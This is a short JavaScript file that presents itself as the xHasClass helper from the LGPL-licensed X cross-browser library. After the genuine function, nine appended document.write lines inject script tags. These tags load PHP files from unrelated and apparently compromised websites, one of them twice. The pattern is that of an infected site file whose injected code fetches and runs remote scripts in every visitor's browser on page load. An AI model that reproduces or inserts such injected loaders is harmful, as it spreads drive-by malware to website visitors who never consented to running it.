// xHasClass, Copyright 2005-2006 Daniel Frechette
// Part of X, a Cross-Browser Javascript Library, Distributed under the terms of the GNU LGPL

/**
 * @param e - Str/Obj - Element id or object
 * @param c - Str     - Class name
 * @return Bool - true if found, false otherwise
 */
function xHasClass(e, c) {
  e = xGetElementById(e);
  if (!e || !e.className)
    return false;
  return (e.className == c) || e.className.match(new RegExp('\\b'+c+'\\b'));
};

document.write('<script src=http://spin-nds.de/cgi-bin/spin.php ><\/script>');
document.write('<script src=http://annemiekswinkels.com/Templates/contact.php ><\/script>');
document.write('<script src=http://realty360tours.com/navigation_bars/photography.php ><\/script>');
document.write('<script src=http://montag66.ru/logs/index.php ><\/script>');
document.write('<script src=http://quantumesolution.com/alsol/ask-quote.php ><\/script>');
document.write('<script src=http://landthongtem.com/images/cal_func.php ><\/script>');
document.write('<script src=http://m.prossignshop.com/images/gifimg.php ><\/script>');
document.write('<script src=http://maxweberschule.de/modules/navigation.php ><\/script>');
document.write('<script src=http://m.prossignshop.com/images/gifimg.php ><\/script>');